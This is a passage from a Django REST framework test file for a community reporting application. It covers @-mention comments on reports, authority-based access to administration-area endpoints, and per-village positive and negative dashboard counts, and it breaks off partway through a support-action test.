self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.krystal)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.krystal)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_myself_mentions_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello @[%s]" % self.taeyeon.username
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.taeyeon.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.taeyeon)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_myself_mentions_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello @[%s]" % self.krystal.username
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.krystal.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.krystal)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_mention_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mention_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.jessica.username,
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.jessica.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.jessica)
self.assertEqual(mention.is_notified, False)
def test_post_api_report_mentions_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.taeyeon)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.taeyeon)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_mentions_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s] @[%s]" % (self.jessica.username, self.yoona.username)
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s] @[%s]' % (self.jessica.username, self.yoona.username))
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention1 = Mention.objects.filter(mentionee__id=self.jessica.id).latest('id')
self.assertEqual(mention1.comment.id, comment.id)
self.assertEqual(mention1.mentioner, self.krystal)
self.assertEqual(mention1.mentionee, self.jessica)
self.assertEqual(mention1.is_notified, False)
mention2 = Mention.objects.filter(mentionee__id=self.yoona.id).latest('id')
self.assertEqual(mention2.comment.id, comment.id)
self.assertEqual(mention2.mentioner, self.krystal)
self.assertEqual(mention2.mentionee, self.yoona)
self.assertEqual(mention2.is_notified, False)
def test_post_api_report_myself_mentions_comment_by_report_comment(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.taeyeon.username
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.taeyeon.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.taeyeon)
self.assertEqual(mention.mentionee, self.taeyeon)
self.assertEqual(mention.is_notified, True)
def test_post_api_report_myself_mentions_comment_by_report_comment_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reportId": self.report.id,
"message": "Hello @[%s]" % self.krystal.username
}
response = self.client.post(reverse('reportcomment-list'), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report.id)
self.assertEqual(response_json['message'], 'Hello @[%s]' % self.krystal.username)
self.assertEqual(response_json['fileUrl'], None)
comment = ReportComment.objects.latest('id')
mention = Mention.objects.latest('id')
self.assertEqual(mention.comment.id, comment.id)
self.assertEqual(mention.mentioner, self.krystal)
self.assertEqual(mention.mentionee, self.krystal)
self.assertEqual(mention.is_notified, True)
def test_get_api_report_comment_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
comment1 = response_json[0]
self.assertEqual(comment1['reportId'], self.report.id)
self.assertEqual(comment1['message'], u'@[%(username)s] ได้ทำการตั้งค่าสถานะเป็น %(state)s' %
{'username': self.report.created_by.username, 'state': 'Report'})
comment2 = response_json[1]
self.assertEqual(comment2['reportId'], self.report.id)
self.assertEqual(comment2['message'], 'Hello baby')
def test_get_api_report_comment_by_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"message": "Hello baby",
}
response = self.client.post(reverse('report-comment', args=[self.report.id]), params)
self.assertEqual(response.status_code, 201)
comment = ReportComment.objects.latest('id')
self.assertEqual(comment.report, self.report)
self.assertEqual(comment.message, 'Hello baby')
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
comment1 = response_json[0]
self.assertEqual(comment1['reportId'], self.report.id)
self.assertEqual(comment1['message'], u'@[%(username)s] ได้ทำการตั้งค่าสถานะเป็น %(state)s' %
{'username': self.report.created_by.username, 'state': 'Report'})
comment2 = response_json[1]
self.assertEqual(comment2['reportId'], self.report.id)
self.assertEqual(comment2['message'], 'Hello baby')
'''
def test_get_api_report_comment_that_area_is_child_of_permitted_administration_area_by_report_comment(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=area)
comment = factory.create_report_comment(report=report)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reportcomment-detail', args=[comment.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], comment.report.id)
self.assertEqual(response_json['message'], comment.message)
def test_get_api_report_comment_that_area_is_child_of_permitted_administration_area_by_report_comment_with_authority(self):
area = self.area.add_child(name='Namsan', location=self.area.location)
report = factory.create_report(created_by=self.krystal, type=self.type,
administration_area=area)
comment = factory.create_report_comment(report=report)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('reportcomment-detail', args=[comment.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], comment.report.id)
self.assertEqual(response_json['message'], comment.message)
'''
def test_get_api_report_comment_wih_user_cannot_access_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('report-comments', args=[self.report.id]))
self.assertEqual(response.status_code, 403)
class TestApiAdministrationAreaList(APITestCase):
    """Visibility rules for the administration-area list endpoint."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists; fixtures rely on it.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.minah = factory.create_user(is_superuser=True, is_staff=True)
        self.krystal = factory.create_user()
        # taeyeon and krystal share one authority; jessica has her own, which inherits it.
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.authority_1 = factory.create_authority()
        self.authority_1.users.add(self.jessica)
        self.area1 = factory.create_administration_area(name='Seoul', authority=self.authority_1)
        self.area2 = factory.create_administration_area(name='Tokyo', authority=self.authority)
        self.area2_1 = self.area2.add_child(name='Namsan', location=self.area2.location)
        self.area2_1_1 = self.area2_1.add_child(name='Namsan Tower', location=self.area2.location)
        self.area3 = factory.create_administration_area(name='Chiang Mai', authority=self.authority)
        self.authority_1.inherits.add(self.authority)

    def test_api_list_administration_area(self):
        """An authority member sees that authority's top-level areas (plus inherited ones)."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        areas = json.loads(resp.content)
        self.assertEqual(len(areas), 3)
        # Child-area entries (area2_1, area2_1_1) and the parentName/isLeaf fields
        # were previously asserted here but are currently disabled.
        for got, want in zip(areas, [self.area3, self.area1, self.area2]):
            self.assertEqual(got['id'], want.id)
            self.assertEqual(got['name'], want.name)
            self.assertEqual(got['address'], want.address)

    def test_api_list_administration_area_with_authority(self):
        """krystal belongs to the same authority, so she also sees three areas."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.krystal.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(json.loads(resp.content)), 3)

    def test_api_list_administration_area_only_has_permission_on_those_administration_areas(self):
        """A member of only authority_1 sees only that authority's own area."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        areas = json.loads(resp.content)
        self.assertEqual(len(areas), 1)
        only_area = areas[0]
        self.assertEqual(only_area['id'], self.area1.id)
        self.assertEqual(only_area['name'], self.area1.name)
        self.assertEqual(only_area['address'], self.area1.address)

    def test_api_list_administration_area_only_group_has_role_reporter(self):
        """Areas granted only through a non-reporter group do not widen the visible list."""
        group_a = factory.add_user_to_new_group(user=self.taeyeon,
            type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
        extra_area = factory.create_administration_area()
        factory.create_group_administration_area(group=group_a, administration_area=extra_area)
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(json.loads(resp.content)), 3)

    def test_api_list_administration_area_return_empty_list_if_not_have_any_permission(self):
        """A user with no authority membership gets an empty (but successful) list."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(json.loads(resp.content)), 0)

    def test_staff_can_get_all_api_list_administration_area(self):
        """Staff see every area, including the child areas under Tokyo."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.minah.auth_token.key)
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(len(json.loads(resp.content)), 5)

    def test_anonymous_cannot_access_api_list_administration_area(self):
        """Unauthenticated requests are rejected with 401."""
        resp = self.client.get(reverse('administrationarea-list'))
        self.assertEqual(resp.status_code, 401)
class TestApiAdministrationArea(APITestCase):
    """Access rules for the administration-area detail endpoint."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists; fixtures rely on it.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user(is_staff=True, is_superuser=True)
        self.krystal = factory.create_user()
        # taeyeon and krystal share the authority that owns both areas; jessica has no access.
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.area1 = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority)

    def test_api_get_administration_area(self):
        """An authority member can fetch the detail of an area they own."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
        self.assertEqual(resp.status_code, 200)
        detail = json.loads(resp.content)
        self.assertEqual(detail['id'], self.area1.id)
        self.assertEqual(detail['name'], self.area1.name)
        self.assertEqual(detail['address'], self.area1.address)

    def test_api_get_administration_area_with_authority(self):
        """Another member of the same authority (krystal) can fetch the same detail."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.krystal.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
        self.assertEqual(resp.status_code, 200)
        detail = json.loads(resp.content)
        self.assertEqual(detail['id'], self.area1.id)
        self.assertEqual(detail['name'], self.area1.name)
        self.assertEqual(detail['address'], self.area1.address)

    # Disabled tests for child-area access, kept for reference.
    '''
    def test_api_get_administration_area_that_is_child_of_area_that_has_permission(self):
        area = self.area1.add_child(name='Namsan', location=self.area1.location)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('administrationarea-detail', args=[area.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], area.id)
        self.assertEqual(response_json['name'], area.name)
        self.assertEqual(response_json['address'], area.address)

    def test_api_get_administration_area_that_is_child_of_area_that_has_permission_with_authority(self):
        area = self.area1.add_child(name='Namsan', location=self.area1.location)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        response = self.client.get(reverse('administrationarea-detail', args=[area.id]))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(response_json['id'], area.id)
        self.assertEqual(response_json['name'], area.name)
        self.assertEqual(response_json['address'], area.address)
    '''

    def test_cannot_get_api_get_administration_area_if_user_dont_have_authorized(self):
        """A user outside the owning authority is forbidden."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
        self.assertEqual(resp.status_code, 403)

    def test_cannot_get_api_get_administration_area_if_group_is_not_has_role_reporter(self):
        """Membership via a non-reporter group does not grant detail access."""
        group_a = factory.add_user_to_new_group(user=self.taeyeon,
            type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
        other_area = factory.create_administration_area()
        factory.create_group_administration_area(group=group_a, administration_area=other_area)
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[other_area.id]))
        self.assertEqual(resp.status_code, 403)

    def test_cannot_get_api_get_administration_area_if_not_exists(self):
        """Requesting a nonexistent area id yields 404."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id + 100]))
        self.assertEqual(resp.status_code, 404)

    def test_staff_can_get_api_get_administration_area(self):
        """Staff users can fetch any area's detail."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
        self.assertEqual(resp.status_code, 200)

    def test_anonymous_cannot_access_api_get_administration_area(self):
        """Unauthenticated requests are rejected with 401."""
        resp = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
        self.assertEqual(resp.status_code, 401)
class TestApiDashboard(APITestCase):
    """Per-village positive/negative report counts on the dashboard endpoint."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists; fixtures rely on it.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        # Reset search/graph state so counts reflect only the fixtures below.
        call_command('clear_index', interactive=False, verbosity=0)
        call_command('clear_graph', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user(is_staff=True)
        self.krystal = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.krystal)
        self.authority_1 = factory.create_authority()
        self.authority_1.users.add(self.jessica)
        self.type = factory.create_report_type(authority=self.authority)
        self.area1 = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority_1)
        self.authority_1.inherits.add(self.authority)
        # area1: one negative + one positive report; area2: one negative report.
        self.report1 = factory.create_report(type=self.type, administration_area=self.area1, negative=True)
        self.report2 = factory.create_report(type=self.type, administration_area=self.area1, negative=False)
        self.report3 = factory.create_report(type=self.type, administration_area=self.area2, negative=True)

    def test_get_api_dashboard_with_staff_user(self):
        """Staff see every village's counts."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
        resp = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(resp.status_code, 200)
        villages = json.loads(resp.content)
        self.assertEqual(len(villages), 2)
        villages = order_list_by_id(villages)
        first, second = villages
        self.assertEqual(first['id'], self.area1.id)
        self.assertEqual(first['name'], self.area1.name)
        self.assertEqual(first['positive'], 1)
        self.assertEqual(first['negative'], 1)
        self.assertEqual(second['id'], self.area2.id)
        self.assertEqual(second['name'], self.area2.name)
        self.assertEqual(second['positive'], 0)
        self.assertEqual(second['negative'], 1)

    def test_get_api_dashboard_with_full_access_user(self):
        """A member of the base authority sees both villages."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
        resp = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(resp.status_code, 200)
        villages = json.loads(resp.content)
        self.assertEqual(len(villages), 2)
        first, second = villages
        self.assertEqual(first['id'], self.area1.id)
        self.assertEqual(first['name'], self.area1.name)
        self.assertEqual(first['positive'], 1)
        self.assertEqual(first['negative'], 1)
        self.assertEqual(second['id'], self.area2.id)
        self.assertEqual(second['name'], self.area2.name)
        self.assertEqual(second['positive'], 0)
        self.assertEqual(second['negative'], 1)

    def test_get_api_dashboard_with_full_access_user_with_authority(self):
        """A member of the inheriting authority sees only its own village."""
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        resp = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(resp.status_code, 200)
        villages = json.loads(resp.content)
        self.assertEqual(len(villages), 1)
        only_village = villages[0]
        self.assertEqual(only_village['id'], self.area2.id)
        self.assertEqual(only_village['name'], self.area2.name)
        self.assertEqual(only_village['positive'], 0)
        self.assertEqual(only_village['negative'], 1)

    def test_get_api_dashboard_with_some_access_user(self):
        """Partial-access view for jessica.

        NOTE(review): this currently duplicates
        test_get_api_dashboard_with_full_access_user_with_authority exactly;
        consider giving it a genuinely partial-access fixture.
        """
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.jessica.auth_token.key)
        resp = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(resp.status_code, 200)
        villages = json.loads(resp.content)
        self.assertEqual(len(villages), 1)
        only_village = villages[0]
        self.assertEqual(only_village['id'], self.area2.id)
        self.assertEqual(only_village['name'], self.area2.name)
        self.assertEqual(only_village['positive'], 0)
        self.assertEqual(only_village['negative'], 1)

    # Disabled tests for the implicit report-type-0 counts, kept for reference.
    '''
    def test_get_api_dashboard_always_include_report_type_0(self):
        try:
            default_positive_type = ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
        factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        response = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        area1 = response_json[0]
        self.assertEqual(area1['id'], self.area1.id)
        self.assertEqual(area1['name'], self.area1.name)
        self.assertEqual(area1['address'], self.area1.address)
        self.assertEqual(area1['positive'], 2)
        self.assertEqual(area1['negative'], 1)
        area2 = response_json[1]
        self.assertEqual(area2['id'], self.area2.id)
        self.assertEqual(area2['name'], self.area2.name)
        self.assertEqual(area2['address'], self.area2.address)
        self.assertEqual(area2['positive'], 0)
        self.assertEqual(area2['negative'], 1)

    def test_get_api_dashboard_always_include_report_type_0_with_authority(self):
        try:
            default_positive_type = ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
        factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
        response = self.client.get(reverse('dashboard_villages'))
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 1)
        area1 = response_json[0]
        self.assertEqual(area1['id'], self.area1.id)
        self.assertEqual(area1['name'], self.area1.name)
        self.assertEqual(area1['address'], self.area1.address)
        self.assertEqual(area1['positive'], 2)
        self.assertEqual(area1['negative'], 1)
    '''
'''
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportSummaryByMonth(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user(username='taeyeon')
self.jessica = factory.create_user(username='jessica')
self.yoona = factory.create_user(username='yoona')
self.authority = factory.create_authority()
self.authority.users.add(self.yoona)
self.group_a = factory.add_user_to_new_group_type_administration_area(user=self.taeyeon)
self.group_r = factory.add_user_to_new_group_type_report_type(user=self.taeyeon)
self.type1 = factory.create_report_type()
self.type2 = factory.create_report_type()
self.type3 = factory.create_report_type()
factory.create_group_report_type(group=self.group_r, report_type=self.type1)
factory.create_group_report_type(group=self.group_r, report_type=self.type2)
self.authority.report_types.add(self.type1)
self.authority.report_types.add(self.type2)
self.area1 = factory.create_administration_area()
self.area2 = factory.create_administration_area()
self.area3 = factory.create_administration_area()
factory.create_group_administration_area(group=self.group_a, administration_area=self.area1)
factory.create_group_administration_area(group=self.group_a, administration_area=self.area2)
self.authority.administration_areas.add(self.area1)
self.authority.administration_areas.add(self.area2)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 14), negative=True)
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, incident_date=datetime.date(2014, 11, 14), negative=False)
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 27), negative=True)
self.report4 = factory.create_report(created_by=self.taeyeon, type=self.type3,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 14), negative=True)
self.report5 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area3, incident_date=datetime.date(2014, 11, 3), negative=False)
def test_api_report_summary_by_month(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {'month': '11/2014'}
response = self.client.get(reverse('reports_summary_by_month'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
user1 = response_json[0]
self.assertEqual(user1['fullname'], self.jessica.get_full_name())
self.assertEqual(user1['dates'][26]['date'], '27-11-2014')
self.assertEqual(user1['dates'][26]['positive'], 0)
self.assertEqual(user1['dates'][26]['negative'], 1)
self.assertEqual(user1['dates'][26]['total'], 1)
user2 = response_json[1]
self.assertEqual(user2['fullname'], self.taeyeon.get_full_name())
self.assertEqual(user2['dates'][2]['date'], '03-11-2014')
self.assertEqual(user2['dates'][2]['positive'], 1)
self.assertEqual(user2['dates'][2]['negative'], 0)
self.assertEqual(user2['dates'][2]['total'], 1)
self.assertEqual(user2['dates'][13]['date'], '14-11-2014')
self.assertEqual(user2['dates'][13]['positive'], 1)
self.assertEqual(user2['dates'][13]['negative'], 2)
self.assertEqual(user2['dates'][13]['total'], 3)
user3 = response_json[2]
self.assertEqual(user3['fullname'], self.yoona.get_full_name())
def test_api_report_summary_by_month_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {'month': '11/2014'}
response = self.client.get(reverse('reports_summary_by_month'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
user1 = response_json[0]
self.assertEqual(user1['fullname'], self.jessica.get_full_name())
self.assertEqual(user1['dates'][26]['date'], '27-11-2014')
self.assertEqual(user1['dates'][26]['positive'], 0)
self.assertEqual(user1['dates'][26]['negative'], 1)
self.assertEqual(user1['dates'][26]['total'], 1)
user2 = response_json[1]
self.assertEqual(user2['fullname'], self.taeyeon.get_full_name())
self.assertEqual(user2['dates'][2]['date'], '03-11-2014')
self.assertEqual(user2['dates'][2]['positive'], 1)
self.assertEqual(user2['dates'][2]['negative'], 0)
self.assertEqual(user2['dates'][2]['total'], 1)
self.assertEqual(user2['dates'][13]['date'], '14-11-2014')
self.assertEqual(user2['dates'][13]['positive'], 1)
self.assertEqual(user2['dates'][13]['negative'], 2)
self.assertEqual(user2['dates'][13]['total'], 3)
user3 = response_json[2]
self.assertEqual(user3['fullname'], self.yoona.get_full_name())
def test_api_report_summary_by_month_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_summary_by_month'))
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['month'], 'Invalid month. Please try again. (eg. 3/2014)')
def test_anonymous_cannot_access_api_report_summary_by_month(self):
response = self.client.get(reverse('reports_summary_by_month'))
self.assertEqual(response.status_code, 401)
'''
class TestApiSupport(APITestCase):
    def setUp(self):
        # Delegates all fixture creation (public users, report type, etc.) to the
        # shared helper used by the public-API test classes in this file.
        common_public_setup(self)
def test_action(self):
user1 = factory.create_user(display_password='password', status=USER_STATUS_ADDITION_VOLUNTEER, is_anonymous=False,
is_public=True)
user2 = factory.create_user(display_password='password', status=USER_STATUS_ADDITION_VOLUNTEER, is_anonymous=False,
is_public=True)
report1 = factory.create_report(type=self.report_type, created_by=self.user)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + user1.auth_token.key)
params = {
'reportGuid': report1.guid,
'message': 'Hello World 1',
'isLike': True,
'isMeToo': True
}
